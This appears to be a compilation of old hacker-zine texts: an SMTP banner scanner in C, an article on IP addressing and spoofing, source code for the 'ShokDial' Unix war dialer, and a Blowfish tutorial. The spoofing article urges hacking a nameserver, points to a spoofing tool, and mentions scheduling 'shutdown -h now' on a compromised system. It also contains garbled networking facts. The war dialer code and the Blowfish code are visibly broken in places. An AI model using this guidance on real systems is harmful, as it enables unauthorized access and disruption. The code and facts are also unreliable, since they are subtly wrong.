#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <netinet/in.h>

/* defining global variables for reading writing creating the socket */

FILE *soc;
int sock;

/* defining void answer(void) function */

void answer();

/* main routing */

int main(argc,argv)
int argc;
char **argv;
{

/* create variables for counting , ip adress string */

int count, port = 25;
char *ips;
struct sockaddr_in ip;
ips = (char *)malloc(100);

/* checking if enough arguments to make the programm working correctly */

if(argc<2)
{
/* if not, tells the usage and quit */

printf("%s - memor/hbs\n",argv[0]);
printf("usage:\n");
printf("%s -dh xxx.xxx[.xxx] [port]\n",argv[0]);
exit(1);
}
else if(argc>3) port = atoi(argv[3]);

/* begining -d or -h scan */

for(count=1;count<256;count++)
{
if(strcmp(argv[1],"-d")==0) sprintf(ips,"%s.%i.1",argv[2],count);
else sprintf(ips,"%s.%i",argv[2],count);
printf("Looking at %s Port %i\n",ips,port);

/* creating socket */

if ( (sock = socket(AF_INET, SOCK_STREAM, 0)) < 0 ) /* i cant open it */
{
/* i cant, i write what error it gives me */
perror("socket");
} else {
soc=fdopen(sock, "r");
ip.sin_family = AF_INET;
ip.sin_port = htons(port);
ip.sin_addr.s_addr = inet_addr(ips);
bzero(&(ip.sin_zero),8);

/* trying to connect..reach the host */

if ( connect(sock, (struct sockaddr *)&ip, sizeof(struct sockaddr)) < 0 )
{
/* i cant, i write what error it gives me */
perror("connect");
} else {

/* getting what the smtp tells me */

answer();

}

/* closing that socket */
close(sock);
}
}
}

/* answering function */

void answer()
{
/*creating a as char type.. */
char ch;
do
{
ch=getc(soc);
printf("%c",ch);
/* i write the cararcter i received */
}
while(ch!='\r');
/* received a 13 .. go back to main() */
printf("\n");
}

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
All About The Internet Protocol
by Malhavoc

Lets start off with the basics of ip's then we will start on some of the
advanced stuff like ip spoofing and masquerading.

First off Ip is short for Internet Protocol. The Internet Protocol defines
how data should be broken down to be transmitted over the internet. Another
part of the Internet Protocol is the Internet Protocol address or IP Address.
The Ip address is a 32-bit number with 4 digits ranging from 0 to 255. The
IP address is similar to your home address in that it is an identifier much
like your home address, except that the ip address identifies each computer
connected or linked to the internet.

Ip addresses can be resolved to domain names and visa versa through DNS which
stands for Domain Name Server or name server for short. Each domain has a
unique IP address assigned to it. Ip can have multiple domain names assigned
to it.

The Ip address also has 4 layers associated with it. They are:

The Application Layer - This deals with the functions of server
applications like FTP and HTTP.

The Transmission Control Protocol Layer - This controls the moving of data
from the source to the
destination ignoring everything
else.

The Internet Protocol Layer - This handles all of the moving data from one
network node to the next.

The Physical Layer - This controls all of the actual communications
hardware such as ethernet cards and modems.


These layers are known as the protocol stack.
Without IPs you can't find any computer on the internet. Something else
associated with the Ip is something called TCP or Transmission Control
Protocol. This basically controls what the ip transmits and recieves to
and from other computers.

There are also 2 types of IPs. They are the Dynamic and the Static ip.
The dynamic ip is an ip that always changes. Sometimes the last 2 digits
are the same, but most of the time the last digit stays the same. The
static ip on the otherhand is the same all of the time, hence the word
static.

As you can see the IP has many functions throughout the internet and if
you mess around with them in the wrong way, you could certainly screw up many
computers, even a whole network up.
How do you do this you ask? READ ON!

In the previous paragraph I said that if you fuck around with an IP or a
computer that is connected to a very large LAN, Network, or Intranet you
could really screw things up quite a bit. There are many ways of doing
this. Some more fun than others. You could hack a system and crontab
shutdown -h now to run every 15 minutes or nuke a server and lag it to
hell, but that could totally cripple a system, and that is not what I like
to condone. What I really like is spoofing. Although it does not screw up
anything it can give you unauthorized access to things or you could just
make your ip and/or domain to whatever you want. Spoofing is not very
hard if you know what you are doing. If you read my explanation of the IP
it explained all about IPs. If you remember everything that I explained
it can help you in your quest to spoof, or you could continue to read this
and learn how to spoof by my teachings.

To do a basic spoof on IRC or something you just need root on a
nameserver and jizz. In case you are saying, "What the hell is a
nameserver?"
, I have included a quick little definition, if you will of a
nameserver.

A nameserver is pretty much a computer that translates the
alphabetic domain name to a numerical IP address.

To get root on a nameserver you either have to:
a) Get unauthorized access to the system, anotherwards hack the system
b) You already own a nameserver connected to the internet

If you would like to use option "a" to get access, you need to find
another file specifically written about hacking(which I am positive I will
write at some point).

or if you chose "b", can I get access?(it was a joke but if i can, e-mail
me at malhavoc@xxedgexx.com) but seriously if you do have one, perfect.
All you need to do now is download jizz. You could download it at my
website at Http://Kaos.xxedgexx.com or go to Http://www.rootshell.com.
Once you download it type gcc -o jizz jizz.c, after that, jizz should
compile in the directory you download to. After the compilation is
complete type ./jizz

Manually Spoofing - The more advanced way to spoof
and for use with people that actually know something.



ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
ShokDial - a linux war dialer
by Shok

I wrote this because someone asked me to, and it's the only war
dialer I've seen for linux. I don't like or use war dialers but I decided
to write it anyway....oh well.

This is new, so it may have a few bugs but it shouldn't have any. If you
see a bug or anything, please let me know (mail me at shok@sekurity.org).

WHAT YOU NEED TO DO:
--------------------

***YOU NEED TO DO THIS***.........

In wardialer.c, at the very top..you will have three #define's you need to
change to your modem, etc.

#define MODEMPORT "/dev/cua1"

This is the COM my modem is on. You NEED to set this to yours.
If your modem is on COM1 (assuming you're using linux), then put /dev/cua0
instead of /dev/cua1.

However if you are using something like IRIX for example it is not
/dev/cua1 (if I recall)...and you'll need to set this to
your modem port.

--------------------

There is also:
#define HANGUPPORT "/dev/ttyS1"

You NEED to change this as well, if you put cua0 earlier, put ttyS0
here...if you put cua1 put ttyS1 here.....etc

However if you have IRIX or soemthing like that it will be
different.....

---------------------

Now all you have to do (and this is optional), there is:
#define TIMEOUT 30

You just set this to how long you will wait for it to try to dial a number
and this will disconnect after so long.

Type shokdial -h for help/options...

Enjoy!


Serial programming for unix.....boy this stuff is fun. Well unix
is famous for it's special files. The modem is just a file you can open(),
read(), and write() to...for that reason this program can be used on all
unixs'. The only thing different that needs to be changed, is the
#define MODEMPORT "/dev/cua1", because most unix/unix clones have their
own modem port. For example /dev/ttyS? which is COM1 (to the DOS users),
would be /dev/ttym? in IRIX. Now once this program opens the modem (via
device/special file) for reading/writing, it will write() to it, and send
it standard modem instructions like +++ATH, ATZ etc....this comes before
any dialing to get the modem ready....we also use a function to check for
"OK" so we know that all is well. On receiving this, then enter the number
we want to dial into a character buffer, append a "\r" to it (to it
actually sends the command), we then write(fd (the file desc. for
/dev/cua1), thebufwiththenum, strlen(thebufwiththenum)); Now once you do
this..you can't write "+++ATH" to it, because it will send that as the
login name (assuming you've connected to a host), so what I did, was I
opened the other modem port (there are two, /dev/cua0 and /dev/ttyS0 are
essentially the same thing (both COM1 to explain it easier), one is used
for dialing out (cua?) and one is used for dialling in and out (ttyS?). So
I opened up the other port and used that to send the command to hang up.
But all the other stuff isn't complex, they are all C primitive
instructions like ScanMin++; which would increse ScanMin by 1, repeat a
while loop, and then the next strcat(phonenum, ScanMin); ... would dial
the next number......you get the idea. That's about all there really is to
say about the technical stuff about it.

Oh yeah one thing.....when it connects, it looks for the string
"CONNECT" returned from the modem serial file. You won't get this message
from faxes as you will only get this message when the connection is
complete, so this will only return *** CONNECT *** if it was a modem. It
will both output to the screen and logfile *** CONNECT *** to
1-xxx-xxx-xxxx. You can use local or long distance, although international
numbers haven't been added at this time (not hard to do just didn't care
to add an extra scanf and an extra CountryCode variable ;)

About ShokDial (it's temp name for now)
---------------------------------------

This supports random scanning (pseudorandom to be honest, heh) and
sequential (the range you specified and up) scanning. You can give it a
range too but that still does under sequential scanning. To use random
scanning use 'shokdial -r', otherwise it will by default use sequential
scanning. For the other options type 'shokdial -h'. You want to keep track
of the version because I'd almsot guarntee this program is going to
continue changing. I need to add some ncurses GUI effects (heh) and a
function to resume scanning for those of you who are too lazy to even look
at the (by default) wardialer.log and get the last number it dialed
(assuming you used sequential scanning) and entering that as the Scan
number to begin on!

It will output to wardialer.log and on to the screen. If you have
BEEP = WANTBEEP in the Makefile, it will beep when it connects to a host.
That's about all I really have to say about it. I don't actually use war
dialers (really), so I haven't actually tested this (sorry if there are
any problems but there shouldn't be)....if you do however find a problem,
please let me know! I will fix it and send out a patched version.....you
can get all of them from ftp.janova.org or www.janova.org. Enjoy ;)

Shok


To Do:

- Add a resume function

- Any good ideas/features that should me added? Mail me at
shok@sekurity.org if you think of something useful
(don't mention a GUI or anything though anyway).

-------------
Makefile:
------------

CC = gcc
#CC = cc

CFLAGS =
#CFLAGS = -g

BEEP = WANTBEEP
#BEEP = NOWANTBEEP

#---------------------------------

all: shokdial

shokdial: shokdial.c errors.c validate.c
$(CC) $(CFLAGS) -D$(BEEP) -o shokdial shokdial.c errors.c validate.c


----------
shokdial.c
----------

/* ShokDial */
/* This is (I have never seen one anyway, I apologize if I'm wrong) */
/* the first war dialer that I've ever seen for unix. This will */
/* compile on most/all unixs' (I didn't use any spiffy or complex */
/* functions). */
/* Enjoy, */
/* --==+*~(Shok)~*+==-- */

#include <termios.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <errno.h>
#include <fcntl.h>
#include <ctype.h>
#include <signal.h>

#define ERROR -1
#define LOGFILE "wardial.log" /* Used as default for logging */
/* unless you change this define */
/* or specify it as an option */

#define TIMEOUT 25 /* YOU WANT TO CONFIGURE THIS!!! */
/* This is how long it will wait until it */
/* gives up. */

/* You can do: */
/* ln -s /dev/cua1 /dev/modem */
/* or change this to /dev/cua1 (or whatever your COM is) */
/* cua0 = COM1 cua1 = COM2 */

#define MODEMPORT "/dev/cua1"

/* Same as above..... */
/* ttyS0 = COM1 ttyS1 = COM2 */

#define HANGUPPORT "/dev/ttyS1"


/* Global variables */
/* ---------------- */
int fd; /* fd for modem */
int numbytes; /* To verify that all the bytes were written */
int random; /* Use random scanning if this is set */
char *ProgName; /* Um duh. */
char LocalOrLong[2]; /* Dialing long distance of local */
int First3Digits; /* Such as "555" of 555-XXXX */
/* However this also serves as the area code */
/* for a long distance number */
int Last3Digits; /* Used as XXX-555-XXXX */
int ScanMin; /* Number to scan from....like 0000 and up */
int ScanMax; /* Stop scanning when this number is reached */
char *LogFile; /* Where to log connections */
char buf[512]; /* Buffer for strings returned by modem */
FILE *logfile; /* for the log file */
/* FILE *resume; */ /* To resume scanning where left off */

struct termios options; /* Baud rate, modes, etc. */


/* Function prototypes */
/* ------------------- */
void usage(void); /* Help/usage */
void version(void); /* Display version */
void intro(void); /* An introduction */
void get_num(void); /* Get phone number and scan prefix */
void get_scannum(void); /* Get range to scan */
void open_port(void); /* Open modem port for dialing */
void set_options(void); /* Set baud rate, termios, etc. */
void init_modem(void); /* Initialize the modem */
void dial_number(void); /* Dial the number */
void hangup(void); /* Hang up modem. */
void sighandler(int signum); /* Used when signals are received */

/* Check read/write/opens for errors */
void check_for_error(int fd, int num, char *s);

/* Check if the phone num was valid */
void local_validnum(int digits);
void long_validnum(int firstdigits, int lastdigits);


void main(int argc, char **argv)
{
struct sigaction sig, sigdef;

system("clear");

/* ------------------------------------------------- */

ProgName = argv[0];

if (argc == 2) {
if ((strcasecmp(argv[1], "-r")) == 0) random = 1;
else if ((strcasecmp(argv[1], "-h")) == 0) usage();
else if ((strcasecmp(argv[1], "-help")) == 0) usage();
else if ((strcasecmp(argv[1], "--help")) == 0) usage();
else if ((strcasecmp(argv[1], "-v")) == 0) version();
else if ((strcasecmp(argv[1], "--version")) == 0) version();
else LogFile=argv[1];
}

else if (argc == 3) {
if ((strcasecmp(argv[1], "-r")) == 0) {
random = 1;
LogFile=argv[2];
}
else usage();
}

else if (argc > 3) usage();

else {
fprintf(stderr, "No log file specified....using %s as log file.\n", LOGFILE);
fprintf(stderr, "-r (random scanning) option not given, using sequential scanning instead.\n");
LogFile=LOGFILE;
}

/* -------------------------------------------------- */

sleep(4);
system("clear"); /* Clear the screen */


/* -------------------------------------------------- */

sig.sa_handler = sighandler;
sigdef.sa_handler = SIG_IGN;
sigemptyset (&sig.sa_mask);
sig.sa_flags = 0;

sigaction(SIGHUP, NULL, &sigdef);
sigaction(SIGINT, &sig, NULL);
sigaction(SIGTERM, &sig, NULL);

/* -------------------------------------------------- */

logfile=fopen(LogFile, "a");
/* resume=fopen(".resume", "w"); */

intro();

if (random != 1) {
get_num(); /* Get the phone number */
get_scannum; /* Get the range to scan */
}
open_port(); /* Open MODEMPORT (by default /dev/cua1) */
set_options; /* Set baud rate, terminal modes, etc. */
init_modem(); /* Send the modem ATZ etc.. */

dial_number(); /* Dial the number/do the scanning */
hangup(); /* Disconnect */

close(fd);
}

/* -------------------------------------------------- */

void version(void)
{
fprintf(stderr, "This is ShokDial, v1.0...please keep notice of this.\n");
fprintf(stderr, "in case this program under goes some new features etc.\n");
fprintf(stderr, "\t\t--==+*~(Shok)~*+==--\n");
exit(0);
}

/* -------------------------------------------------- */

void usage(void)
{
fprintf(stderr, "Usage: %s [options] [logfile]\n", ProgName);
fprintf(stderr, "Options:\n");
fprintf(stderr, "-r for random (as opposed to sequential) scanning\n");
fprintf(stderr, "-h for help....what you're seeing now");
fprintf(stderr, "-v for the version...because this will probably undergo changes\n\n");
fprintf(stderr, "If no log file is specified, \"%s\" is used.\n", LOGFILE);
exit(0);
}

/* -------------------------------------------------- */

void intro(void)
{
printf("Shok's war dialer for UNIX (affectionately known as ShokDial).....\n");
printf("------------------------------------------------------------------\n");
printf("This is still in the beta version so it doesn't have a nice\n");
printf("graphical interface yet.\n");
printf("\nWell what you do here, is enter 0000 for the range to begin\n");
printf("scanning and 9999 to end scanning if you want to scan all the\n");
printf("possible ranges, but you can put 4444 for the nmber to start\n");
printf("and 5555 for the number to begin to scan XXX-[4444-5555] for\n");
printf("local numbers and it would be 1-XXX-XXX-[4444-5555] for long\n");
printf("distance.\n");
printf("\nAlso, you can use random scanning (as opposed to sequential\n");
printf("scanning) by specifying the \"-r\" option...type:\n");
printf("%s -h for help.\n\n", ProgName);
printf("Anyway..enjoy!\n");
printf("\t\t\t--==+*~(Shok)~*+==--\n\n");

printf("Hit any key to continue.\n");
getchar();
}

/* -------------------------------------------------- */

void get_num(void)
{

printf("Scanning..\n(L)ocal, Long (D)istance\n");
scanf("%2s", &LocalOrLong);

if((strncasecmp(LocalOrLong, "L", 1)) == 0) {
printf("Enter number to dial (753 for 753-XXXX): ");
scanf("%d", &First3Digits);
local_validnum(First3Digits);

}
else if ((strncasecmp(LocalOrLong, "D", 1)) == 0) {
printf("Enter number to dial (555555 for 555-555-XXXX): ");
scanf("%3d%3d", &First3Digits, &Last3Digits);
long_validnum(First3Digits, Last3Digits);

}
else {
fprintf(stderr, "You must specify L for local or D for Long Distance\n");
exit(ERROR);
}

}

/* -------------------------------------------------- */

void get_scannum(void)
{
printf("Enter number to start scanning at: ");
scanf("%4d", &ScanMin);
putchar('\n');

if ((ScanMin >= 0) && (ScanMin <= 9999)) { /* Do nothing */
}
else {
fprintf(stderr, "%d is invalid.\nScanning range must be 0000-9999\n", ScanMin);
exit(ERROR);
}

printf("Enter number to end scanning: ");
scanf("%4d", &ScanMax);
putchar('\n');

if ((ScanMax > ScanMin) && (ScanMax > 0) && (ScanMax <= 9999)) {
/* Do nothing */
}
else {
fprintf(stderr, "%d is invalid.\nScanning range must be 0000-9999\n", ScanMax);
exit(ERROR);
}

}

/* -------------------------------------------------- */

void open_port(void)
{
printf("Opening modem for dialing...\n");
fd = open(MODEMPORT, O_RDWR | O_NOCTTY | O_NDELAY);
if (fd == ERROR) {
perror("open");
exit(ERROR);
}

}

/* -------------------------------------------------- */

void set_options(void)
{
tcgetattr(fd, &options);

options.c_cflag |= (CLOCAL | CREAD);
options.c_cflag &= ~PARENB;
options.c_cflag &= ~CSTOPB;
options.c_cflag &= ~CSIZE;
options.c_cflag |= CS8;

options.c_iflag |= (INPCK | ISTRIP);
options.c_lflag &= ~(ICANON | ECHO | ISIG);
options.c_oflag &= ~OPOST;

cfsetispeed(&options, B115200);
cfsetospeed(&options, B115200);

tcsetattr(fd, TCSANOW, &options);
}

/* -------------------------------------------------- */

void init_modem(void)
{
printf("Initializing modem (port %s)....\n", MODEMPORT);

/* Hang up modem if it's already on */

hangup();

numbytes=write(fd, "ATZ\r", 4);
check_for_error(fd, numbytes, "write");

sleep(3);

}

/* -------------------------------------------------- */

void dial_number(void)
{

char phonenum[20]; /* If local: phonenum = First3Digits + ScanMin */
/* If long distance: phonenum = */
/* First3Digits + Last3Digits + ScanMin */
char phonenum1[20]; /* Same as above except this has "\r" as well */
char connectmsg[50]; /* the message to the log file */

printf("Giving a %s second connection timeout", TIMEOUT);


if ((strncasecmp(LocalOrLong, "L", 1)) == 0) { /* Local call */

while (1) {

if (random == 1) ScanMin = (rand() % 8889) + 1111;

strcat(phonenum, (char *)First3Digits);
strcat(phonenum, (char *)ScanMin);
strcpy(phonenum1, (char *)phonenum);
strcat(phonenum1, "\r");

if (random != 1) {
printf("Dialing %d-%d.\n", First3Digits, ScanMin);
numbytes = write(fd, phonenum1, strlen(phonenum1));
check_for_error(fd, numbytes, "write");
}

else { /* if random == 1 */
printf("Dialing %d-%d.\n", First3Digits, ScanMin);
numbytes = write(fd, phonenum1, strlen(phonenum1));
check_for_error(fd, numbytes, "write");
}

sleep(TIMEOUT); /* How long to wait for timeout */

numbytes = read(fd, buf, 511);
check_for_error(fd, numbytes, "read");

/* Compare the string with "CONNECT" */
if((strncmp(buf, "CONNECT", 7)) == 0) {
#ifdef WANTBEEP
fputc('\a', stderr);
#endif
fprintf(stderr, "*** CONNECT *** to %d-%d\n", First3Digits, ScanMin);

/* Log it */
sprintf(connectmsg, "*** CONNECT *** to %d-%d\n", First3Digits, ScanMin);
fputs(connectmsg, logfile);

bzero(connectmsg, 50); /* Clear the message */
}

bzero(buf, 512); /* Reset buffer */

hangup();

if (random != 1) {

/* Increase ScanMin so it scans for the next number */
ScanMin += 1;

if (ScanMin > ScanMax) {
fputc('\a', stderr);
fprintf(stderr, "ALL DONE SCANNING....THANKS FOR USING\n");
exit(0);
}

}

bzero(phonenum, 20); /* Clear the phone number */
bzero(phonenum1, 20); /* Ditto */

} /* End of while loop */
} /* End of if */

else { /* if LocalOrLong == "D" (Long Distance call) */

while(1) {

if (random == 1) ScanMin = (rand() % 8889) + 1111;

strcat(phonenum, "1");
strcat(phonenum, (char *)First3Digits); /* Area Code */
strcat(phonenum, (char *)Last3Digits); /* 1-XXX-555-XXXX */
strcat(phonenum, (char *)ScanMin); /* 1-XXX-XXX-0000 */
strcpy(phonenum1, (char *)phonenum); /* Copy it to another */
strcat(phonenum1, "\r"); /* buf to append "\r" to it */

if (random != 1) {
printf("Dialing 1-%d-%d-%d.\n", First3Digits, Last3Digits, ScanMin);
numbytes = write(fd, phonenum1, strlen(phonenum1));
check_for_error(fd, numbytes, "write");
}

else { /* if random == 1 */
printf("Dialing 1-%d-%d-%d.\n", First3Digits, Last3Digits, ScanMin);
numbytes = write(fd, phonenum1, strlen(phonenum1));
check_for_error(fd, numbytes, "write");
}

sleep(TIMEOUT); /* How long to wait for timeout */

numbytes = read(fd, buf, 511);
check_for_error(fd, numbytes, "read");

/* Compare the string with "CONNECT" */
if((strncmp(buf, "CONNECT", 7)) == 0) {
fputc('\a', stderr);
fprintf(stderr, "*** CONNECT *** to 1-%d-%d-%d\n", First3Digits, Last3Digits, ScanMin);

/* Log it */
sprintf(connectmsg, "*** CONNECT *** to 1-%d-%d-%d\n", First3Digits, Last3Digits, ScanMin);
fputs(connectmsg, logfile);

bzero(connectmsg, 50); /* Clear the message */
}

bzero(buf, 512); /* Reset buffer */

hangup();

if (random != 1) {

/* Increase ScanMin so it scans for the next number */
ScanMin += 1;

if (ScanMin > ScanMax) {
fputc('\a', stderr);
fprintf(stderr, "ALL DONE SCANNING....THANKS FOR USING\n");
break;
}

}

bzero(phonenum, 20); /* Clear the phone number */
bzero(phonenum1, 20); /* Ditto */


} /* End of while loop */
} /* End of if/else loop */

fclose(logfile);
} /* End of dial_num */

void hangup(void)
{
/* After testing put this in the init_modem() section */
/* for optimize it. */

int fd1; /* fd for modem (hang up) */

fd1=open(HANGUPPORT, O_RDWR | O_NOCTTY | O_NDELAY);
if (fd1 == ERROR) {
perror("open");
close(fd1);
close(fd);
exit(ERROR);
}

numbytes=write(fd1, "+++\r", 4);
check_for_error(fd1, numbytes, "write");

sleep(1);

numbytes=write(fd1, "ATH\r", 4);
check_for_error(fd1, numbytes, "write");

sleep(3);

/* Should/will check for "OK */
close(fd1);

}

void sighandler(int signum)
{
char message[50];

fprintf(stderr, "
Receive signal to quit....closing up modem, logging last number dialed,\nand exitting\n");
if (random != 1) fprintf(stderr, "
Last number dialed was: ");

if((strncasecmp(LocalOrLong, "
L", 1)) == 0) {
if (random != 1) {
sprintf(message, "
%d-%d\n", First3Digits, Last3Digits);
fprintf(stderr, message);
fprintf(logfile, message);
/* fprintf(resume, "
%d%d\n", First3Digits, Last3Digits); */
}
}
else { /* if LocalOrLong == "
D" */
if (random != 1) {
sprintf(message, "
1-%d-%d-%d\n", First3Digits, Last3Digits, ScanMin);
fprintf(stderr, message);
fprintf(logfile, message);
/* fprintf(resume, "
1%d%d%d\n", First3Digits, Last3Digits, ScanMin); */
}
}

/* hangup(); */
close(fd);
/* fclose(resume); */
fclose(logfile);
exit(ERROR);
}

/* void resume(void)
{

}
*/

-----------
validate.c
-----------

/* Functions: */
/* local_validnum */
/* long_validnum */

#include <stdio.h>
#include <unistd.h>

#define ERROR -1

/* Check if it was a valid local number */
void local_validnum(int digits)
{

if ((digits > 111) && (999 > digits)) {
/* Do nothing */
}
else {
fprintf(stderr, "
%d is invalid.\nThe number must be 111-999\n", digits);
exit(ERROR);
}

}

void long_validnum(int firstdigits, int lastdigits)
{
if (((firstdigits > 111) && (firstdigits < 999)) && ((lastdigits > 111) && (lastdigits < 999))) {
/* Do nothing */
}
else {
fprintf(stderr, "
%d%d is invalid.\nThe number must 111111-999999\n", firstdigits, lastdigits);
exit(1);
}


}

---------
errors.c
---------


/* Functions: */
/* check_for_error */

#include <unistd.h>
#include <stdio.h>

#define ERROR -1

void check_for_error(int fd, int num, char *s)
{
if (num == ERROR) {
fprintf(stderr, "
Error: Unable to %s all the bytes.\n", s);
hangup();
close(fd);
exit(ERROR);
}

}


ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
The Blowfish Algorithm: A Look Under The Hood
by The Messiah

Contents
* Introduction
* Key Setup
* Encryption
* Decryption
* Review
* Test Vectors


INTRODUCTION: The Blowfish encryption algorithm is one of the most well-known
encryption algorithms in the public domain. It was written by noted
cryptologist Bruce Schneier, and placed in the public domain in 1994. It uses
a variable-size key (from 32 to 448 bits), has a 64-bit blocksize, and
encrypts the plaintext 16 times, or "
rounds." It is a symetric algorithm,
meaning the key used to encrypt is the same key used to decrypt. It was
designed to run best in software implementations, as opposed to DES, which
was designed to run in hardware implementations.

KEY SETUP: Blowfish has a complex key setup required before any encryption or
decryption can be done. This is the most complicated part of the algorithm.

P-array: The P array is an array of 18 32-bit entries- array[1..18] of
LongInt;
S-Boxes: There are 4 S-boxes, each with 256 32-bit entries-
array[0..255] of LongInt;

1.) Initialize the P-array and S-boxes in order with the hexadecimal
digits of Pi, starting from the .1 place.

for i := 1 to 18 do
Parray[i] := GetPiDigit(i);
for i := 0 to 255 do
SBox1[i] := GetPiDigit(i+19);
for i := 0 to 255 do
SBox2[i] := GetPiDigit(i+257);
for i := 0 to 255 do
SBox3[i] := GetPiDigit(i+513);
for i := 0 to 255 do
SBox4[i] := GetPiDigit(i+787);

2.) Cycle through the P-array, XORing the entry with a 32-bit value
from the passphrase.

Len : Byte;
PassStr : String;
password : array[1..14] of LongInt;

Move(PassStr, password, Length(PassStr));
Len := Length(PassStr);
if Len mod 4 <> 0 then Inc(Len);
for i := 1 to Len do
for j := i to Len do
Parray[j] := Parray[j] xor password[j];
for i := Len downto 1 do
for j := Len downto i do
Parray[j] := Parray[j] xor password[j];

3.) Encrypt an all-zero string wil the current S-boxes and replace
P-array[1] and P-array[2] with the value. (See the encryption
section for more info)

zeros : TCipherBlock;

zeros[0] := 0;
zeros[1] := 0;
zero := Encrypt(zero);
Parray[1] := zeros[0];
Parray[2] := zeros[1];

4.) Fill the rest of the P-array and S-boxes in order, using the
output of the encrypted string, changing the string to the
last encrypted one:

i := 3;
while i <> 18 do
begin
zero := Encrypt(zero);
Parray[i] := zeros[0];
Parray[i+1] := zeros[1];
Inc(i,2);
end;

i := 0;
while i <> 255 do
begin
zero := Encrypt(zero);
SBox1[i] := zeros[0];
SBox1[i+1] := zeros[1];
Inc(i,2);
end;

and so on....


ENCRYPTION: Encryption is done with two parts- the main part, and the F
function.

1.) The F function divides the left half of a cipherblock
(a 32-bit value) into four values and encrypts them with
the S-boxes.

function F_Funct(Input : LongInt) : LongInt;
var
foo : array[0..3] of Byte;
begin
Move(Input, foo, 8);
F_Funct := (SBox1[foo[0]] + SBox2[foo[1]] mod 232) xor SBox3[foo[2]]) + SBox4[foo[3]] mod 232;
end;


2.) The main part encrypts a 64-bit long block (two LongInts):

type
TCipherBlock = array[0..1] of LongInt;

function Encrypt(Input : TCipherBlock) : TCipherBlock;
var
I : Byte;
bin, bash : LongInt;
foo : TCipherBlock;
begin
foo := Input;
for i := 1 to 16 do (* number of rounds *)
begin
foo[0] := foo[0] xor Parray[i];
foo[1] := F_Funct(foo[0]) xor foo[1];
bin := foo[0];
foo[1] := foo[0];
foo[0] := bin;
bin := foo[0];
foo[1] := foo[0];
foo[0] := bin;
foo[1] := foo[1] xor Parray[17];
foo[0] := foo[0] xor Parray[18];
end;
Encrypt := foo;
end;

DECRYPTION: Decryption is the same as encryption, except it uses the
P-array backwards.

1.) Decryption function:

function Decrypt(Input : TCipherBlock) : TCipherBlock;
var
I : Byte;
bin, bash : LongInt;
foo : TCipherBlock;
begin
foo := Input;
for i := 16 downto 1 do
begin
foo[0] := foo[0] xor Parray[i];
foo[1] := F_Funct(foo[0]) xor foo[1];
bin := foo[0];
foo[1] := foo[0];
foo[0] := bin;
bin := foo[0];
foo[1] := foo[0];
foo[0] := bin;
foo[1] := foo[1] xor Parray[18];
foo[0] := foo[0] xor Parray[17];
end;
Decrypt := foo;
end;

REVIEW:
Ahh, how I love being a critic. Blowfish is one of my favorite
algorithms, simply because it has the largest key size, is VERY fast, and is
public domain. It is relatively new, but so far all crypanalysis has found no
real flaws. The only thing I know of is a slight weakness in 14-round
variants of Blowfish, but most, if not all, implementations of Blowfish use
the 16-round specs. Blowfish is simple, fairly easy to implement (the only
hard part for me was finding all those digits of Pi), and VERY VERY fast. In
a recent speed test using an optimized implementation of Blowfish, it used
only 18 cycles per encrypted byte. Since it is one of the newer algorithms,
it was designed with modern computing power in mind, unlike DES, which has
fallen to brute force attacks. It's also in the public domain, unlike IDEA,
so you may use it in a commercial application without having to pay
royalties. I would use this over most other algorithms for communication
(in CFB mode), or file storage, unless speed was the highest priority.

TEST VECTORS: Should you be making your own implementation of Blowfish,
here's Eric Young's test vectors-

All data is shown as a hex string with 012345 loading as
data[0]=0x01;
data[1]=0x23;
data[2]=0x45;
ecb test data (taken from the DES validation tests)

key bytes clear bytes cipher bytes
0000000000000000 0000000000000000 4EF997456198DD78
FFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFF 51866FD5B85ECB8A
3000000000000000 1000000000000001 7D856F9A613063F2
1111111111111111 1111111111111111 2466DD878B963C9D
0123456789ABCDEF 1111111111111111 61F9C3802281B096
1111111111111111 0123456789ABCDEF 7D0CC630AFDA1EC7
0000000000000000 0000000000000000 4EF997456198DD78
FEDCBA9876543210 0123456789ABCDEF 0ACEAB0FC6A0A28D
7CA110454A1A6E57 01A1D6D039776742 59C68245EB05282B
0131D9619DC1376E 5CD54CA83DEF57DA B1B8CC0B250F09A0
07A1133E4A0B2686 0248D43806F67172 1730E5778BEA1DA4
3849674C2602319E 51454B582DDF440A A25E7856CF2651EB
04B915BA43FEB5B6 42FD443059577FA2 353882B109CE8F1A
0113B970FD34F2CE 059B5E0851CF143A 48F4D0884C379918
0170F175468FB5E6 0756D8E0774761D2 432193B78951FC98
43297FAD38E373FE 762514B829BF486A 13F04154D69D1AE5
07A7137045DA2A16 3BDD119049372802 2EEDDA93FFD39C79
04689104C2FD3B2F 26955F6835AF609A D887E0393C2DA6E3
37D06BB516CB7546 164D5E404F275232 5F99D04F5B163969
1F08260D1AC2465E 6B056E18759F5CCA 4A057A3B24D3977B
584023641ABA6176 004BD6EF09176062 452031C1E4FADA8E
025816164629B007 480D39006EE762F2 7555AE39F59B87BD
49793EBC79B3258F 437540C8698F3CFA 53C55F9CB49FC019
4FB05E1515AB73A7 072D43A077075292 7A8E7BFA937E89A3
49E95D6D4CA229BF 02FE55778117F12A CF9C5D7A4986ADB5
018310DC409B26D6 1D9D5C5018F728C2 D1ABB290658BC778
1C587F1C13924FEF 305532286D6F295A 55CB3774D13EF201
0101010101010101 0123456789ABCDEF FA34EC4847B268B2
1F1F1F1F0E0E0E0E 0123456789ABCDEF A790795108EA3CAE
